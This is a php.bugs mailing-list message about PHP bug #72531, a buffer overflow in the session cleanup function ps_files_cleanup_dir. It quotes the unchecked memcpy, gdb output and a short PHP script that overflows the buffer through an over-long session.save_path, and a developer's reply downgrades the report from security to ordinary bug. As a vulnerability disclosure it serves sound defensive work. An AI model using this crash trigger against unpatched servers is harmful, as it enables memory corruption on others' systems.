Sec Bug->Bug #72531 [Opn]: ps_files_cleanup_dir Buffer overflow

From: Date: Sat, 02 Jul 2016 08:21:06 +0000
Subject: Sec Bug->Bug #72531 [Opn]: ps_files_cleanup_dir Buffer overflow
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-201984@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=72531&edit=1 ID: 72531 Updated by: stas@php.net Reported by: dotagosudaily at gmail dot com Summary: ps_files_cleanup_dir Buffer overflow Status: Open -Type: Security +Type: Bug Package: Directory function related Operating System: All PHP Version: 7.1.0alpha1 Block user comment: N Private report: Y New Comment: Not a security issue - session.save_path is not a setting that should be accessible to remote user, it's an automatic arbitrary file write. Previous Comments: ------------------------------------------------------------------------ [2016-07-02 01:36:53] dotagosudaily at gmail dot com Description: ------------ ext/session/mod_files.c:276 static int ps_files_cleanup_dir(const char *dirname, zend_long maxlifetime) { ... char buf[MAXPATHLEN]; ... dirname_len = strlen(dirname); memcpy(buf, dirname, dirname_len); ... buf is static buffer declared with size MAXPATHLEN ( 256 bytes ) length of dirname never check with MAXPATHLEN when dirname len > 256 it will overflow When run php under debugger we observered: Breakpoint 2, ps_files_cleanup_dir (dirname=0xf7a72000 'A' <repeats 200 times>..., maxlifetime=0x5a0) at /home/suto/php-src-master/ext/session/mod_files.c:298 298 memcpy(buf, dirname, dirname_len); gdb$ p dirname_len $1 = 0xfb0 0xfb0 is len of directory we created and larger more than 256. Test script: --------------- $fname = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"; $dirname = str_repeat($fname,16); //wp_mkdir_p($dirname); Make a directory with name $fname ini_set('session.save_path',$dirname); ini_set('session.gc_probability', 1000); session_start(); ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=72531&edit=1

« previous php.bugs (#201984) next »